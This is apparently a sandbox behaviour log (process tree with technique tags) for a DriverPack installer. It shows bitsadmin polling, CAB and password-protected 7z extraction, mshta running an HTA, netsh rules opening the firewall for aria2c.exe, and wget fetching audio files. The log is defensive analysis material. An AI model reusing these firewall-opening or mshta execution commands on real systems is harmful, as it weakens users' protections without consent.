- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2144
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2212
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2852
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2504
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2776
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1612
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1788
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2244
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2356
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1052
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2000
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1780
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1984
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:680
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:872
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1500
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1496
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:2304
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2340
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2168
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2720
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2748
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2348
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3044
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2144
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:2924
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2224
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c expand "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\dwnl_beetle-cab.cab" -F:* C:\Users\Admin\AppData\Local\Temp > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_expand.txt"
  2⤵
  PID:2556
- - C:\Windows\SysWOW64\expand.exe
    expand "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\dwnl_beetle-cab.cab" -F:* C:\Users\Admin\AppData\Local\Temp
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\Admin\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_7zip.txt"
  2⤵
  - Loads dropped DLL
  PID:2496
- - C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe
    C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\Admin\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_runAsAdmin.txt"
  2⤵
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\start.bat"
    3⤵
    PID:2988
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\run.hta" --sfx
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of AdjustPrivilegeToken
      PID:2500
    - - C:\Windows\SysWOW64\rundll32.exe
        
        rundll32 kernel32,Sleep
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_3616.txt""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2084
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1240
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_50979.txt""
        5⤵
        
        PID:2732
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_80402.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_80402.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1728
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_80402.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_82548.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_82548.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:444
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_82548.log"
        6⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_24303.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_24303.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2156
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_24303.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2888
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_87316.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_87316.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2140
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_87316.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3040
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_82271.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_82271.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_82271.log"
        6⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1288
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_89851.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_89851.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2336
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_89851.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:680
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_93257.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_93257.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:980
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_93257.log"
        6⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_59966.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_59966.txt""
        5⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1684
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_59966.log"
        6⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_7122.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_7122.txt""
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:752
      - C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe
        
        "tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_7122.log"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2512
